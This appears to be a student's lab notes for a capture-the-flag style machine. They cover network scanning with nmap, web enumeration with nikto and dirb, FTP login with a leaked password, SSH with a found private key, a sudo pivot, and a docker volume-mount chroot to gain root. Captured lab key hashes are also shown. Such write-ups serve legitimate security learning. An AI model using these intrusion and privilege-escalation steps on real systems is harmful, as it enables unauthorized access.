'%3E%3Cg fill='%23000'%3E%3Cpath clip-rule='evenodd' d='m89 11.7c-.8 0-2.2.2-3.2 1.6v-8.10005h-2.8v16.80005h2.7v-1.3c1.1 1.5 2.6 1.5999 3.2 1.5999 3 0 5-2.2999 5-5.2999s-2-5.3-4.9-5.3zm-.7 2.5c1.7 0 2.8 1.2 2.8 2.8s-1.2 2.8-2.8 2.8c-1.7 0-2.8-1.2-2.8-2.8s1.1-2.8 2.8-2.8z' fill-rule='evenodd'/%3E%3Cpath d='m71.2 21.9999v-7.6h1.9v-2.4h-1.9v-3.40005h-2.8v3.40005h-1.1v2.4h1.1v7.6z'/%3E%3Cpath clip-rule='evenodd' d='m65.6999 12h-2.9v1.3c-.8999-1.5-2.4-1.6-3.2-1.6-2.9 0-4.8999 2.4-4.8999 5.3s1.9999 5.2999 5.0999 5.2999c.8 0 2.1001-.0999 3.1001-1.5999v1.3h2.7999zm-5.1999 7.8c-1.7001 0-2.8-1.2-2.8-2.8s1.2-2.8 2.8-2.8c1.7 0 2.7999 1.2 2.7999 2.8s-1.1999 2.8-2.7999 2.8z' fill-rule='evenodd'/%3E%3Cpath d='m79.7001 14.4c-.7-.6-1.3-.7-1.6-.7-.7 0-1.1.3-1.1.8 0 .3.1.6.9.9l.7.2c.1261.0472.2621.0945.4037.1437.7571.2632 1.6751.5823 2.0963 1.2563.3.4.5 1 .5 1.7 0 .9-.3 1.8-1.1 2.5s-1.8 1.0999-3 1.0999c-2.1 0-3.2-.9999-3.9-1.6999l1.5-1.7c.6.6 1.4 1.2 2.2 1.2s1.4-.4 1.4-1.1c0-.6-.5-.9-.9-1l-.6-.2c-.0687-.0295-.1384-.0589-.2087-.0887l-.0011-.0004c-.6458-.2729-1.3496-.5704-1.8902-1.1109-.5-.5-.8-1.1-.8-1.9 0-1 .5-1.8 1-2.3.8-.6 1.8-.7 2.6-.7.7 0 1.9.1 3.2 1.1z'/%3E%3Cpath d='m98.5 20.5-4.8-8.5h3.3l3.1 5.7 2.8-5.7h3.2l-8 15.3h-3.2z'/%3E%3Cpath d='m47 13.7h7c0 .0634.01.1267.0206.1932.0227.1435.0477.3018-.0206.5068 0 4.5-3.4 8.1-8 8.1s-8-3.6-8-8.1c0-4.49995 3.6-8.09995 8-8.09995 2.6 0 5 1.2 6.5 3.3l-2.3 1.49995c-1-1.29995-2.6-2.09995-4.2-2.09995-2.9 0-4.9 2.49995-4.9 5.39995s2.1 5.3 5 5.3c2.6 0 4-1.3 4.6-3.2h-3.7z'/%3E%3C/g%3E%3Cpath d='m18 14h7c0 5.2-3.7 9.6-8.5 10.8l-13.19995-13.2c1.1-4.9 5.5-8.6 10.69995-8.6 3.7 0 6.9 1.8 8.9 4.5l-1.5 1.3c-1.7-2.3-4.4-3.8-7.4-3.8-3.9 0-7.29995 2.5-8.49995 6l11.49995 11.5c2.9-1 5.1-3.5 5.8-6.5h-4.8z' fill='%23fff'/%3E%3Cpath d='m6.2 21.7001c-2.1-2.1-3.2-4.8-3.2-7.6l10.8 10.8c-2.7 0-5.5-1.1-7.6-3.2z' fill='%23fff'/%3E%3Cpath d='m14 0c-7.7 0-14 6.3-14 14s6.3 14 14 14 14-6.3 14-14-6.3-14-14-14zm-7.8 21.8c-2.1-2.1-3.2-4.9-3.2-7.6l10.9 10.8c-2.8-.1-5.6-1.1-7.7-3.2zm10.2 2.9-13.1-13.1c1.1-4.9 5.5-8.6 10.7-8.6 3.7 0 6.9 1.8 8.9 4.5l-1.5 1.3c-1.7-2.3-4.4-3.8-7.4-3.8-3.9 0-7.2 2.5-8.5 6l11.5 11.5c2.9-1 5.1-3.5 5.8-6.5h-4.8v-2h7c0 5.2-3.7 9.6-8.6 10.7z' fill='%237026b9'/%3E%3C/g%3E%3C/svg%3E){kind=small}
#InvestigationMethodology
To reach an IP address of a system on a network, we do
first
dhclient -v
nmap -sT -p80 -vv 192.168.254.0/24 | grep open
80 is used because generally the 80th port is open.
in the results we have seen 2 ip addresses 192.168.254.254 (for the router) 192.168.254.166 (it's the remote host) we go to this address on the web browser
result is:
![[Pasted image 20240419101809.png]]
this is the result. we have discovered 2 different IPs vulnerable on the network. ---.254 is for the router, ---.166 is for the PC.
nikto -h (ip address of the host) tool to find ::: Nikto est un scanner de vulnérabilité en ligne de commande logiciel gratuit qui analyse les serveurs Web à la recherche de fichiers/CGI dangereux, de logiciels serveur obsolètes et d'autres problèmes.
![[Pasted image 20240419113519.png]]
here we see that robots.txt might have something; we visit it
![[Pasted image 20240419113603.png]]
we see that we can go to /nothing
![[Pasted image 20240419113637.png]]
there's nothing there too.
we use another way for exploiting. we'll use dirbuster
in dirbuster , put the ip address (http://192.168.254.166:80 with the port number) and click browse. go to share and dirbuster folder.
/usr/share/dirbuster/wordlists
![[Pasted image 20240419114356.png]]
we select the list and click start. results go like this ![[Pasted image 20240419114706.png]]
GUI did give an error.
So we'll do this on the command line
dirb http://192.168.254.166 /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
dirb http://192.168.254.137:80 /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
![[Pasted image 20240419121116.png]]
Study this again !!
tail -f /var/log/apache2/access.log
cat fichier.txt / .log
| grep GET
| AWK {print$2 $8}
We use dirbuster to find secret URLs on the website.
We have found hidden_text
so we go to 192.168.254.166/hidden_text
![[Pasted image 20240419135859.png]]
we check pwned.vuln and see this
![[Pasted image 20240419140152.png]]
in the page source there are details ;
![[Pasted image 20240419135956.png]]
this password doesnt work on the login page. it hints ftp so we try to connect to ftp
go to terminal and connect to ftp with the ftpuser
![[Pasted image 20240419140309.png]]
we're in ! not through a vulnerability but we've found a way to access to FTP.
we use this line to connect with the SSH key.
![[Pasted image 20240419141719.png]]
we found the path of an SSH key in the /home/ftpuser/share/id_rsa
then we connect to ariana's account because it's one of the user's in the pc.
we do
ssh ariana@192.168.254.166 -i /home/ftpuser/share/id_rsa
then we're in ariana !
![[Pasted image 20240419143832.png]]
![[Pasted image 20240419143959.png]]
![[Pasted image 20240419144057.png]]
we execute the messenger.sh : to give rights to selena account
to exe: ![[Pasted image 20240419145643.png]]
inside messenger.sh we have opened another terminal inside the terminal. inside the file we give ariana the ALL (ALL) NOPASSWD rights on the file in the etc/sudoers file
and then to access to the messenger.sh file as selena we do this command:
sudo -u selena /home/messenger.sh
RECAP OF WHAT WE HAVE DONE TO ACCESS
SSH --> ftpuser - /bin/bash --> SSH ariana - /bin/bash --> sudo --> selena - /bin/bash --> /home/messenger.sh --> bin/bash --> selena ( dafuq ? )
inside the terminal of the bash of selena, we write this command;
python3 -c 'import pty; pty.spawn("/bin/bash")'
![[Pasted image 20240419151511.png]]
[!NOTE] ariana key ; fb8d98be1265dd88bac522e1b2182140 selena key ; 711fdfc6caad532815a440f7f295c176
ps guaxf to see the active apps on the system.
we see that docker is active in the background.
![[Pasted image 20240419155151.png]]
in docker with docker commands we'll have the access to the root rights.
docker run -v /:/mnt --rm -it privesc chroot /mnt /bin/bash
this command helps us to move the privesc fule in the docker images to the mnt file so that we can have root rights.
![[Pasted image 20240419155939.png]]
this way i've became the root
![[Pasted image 20240419155955.png]]
192.168.254.152:2049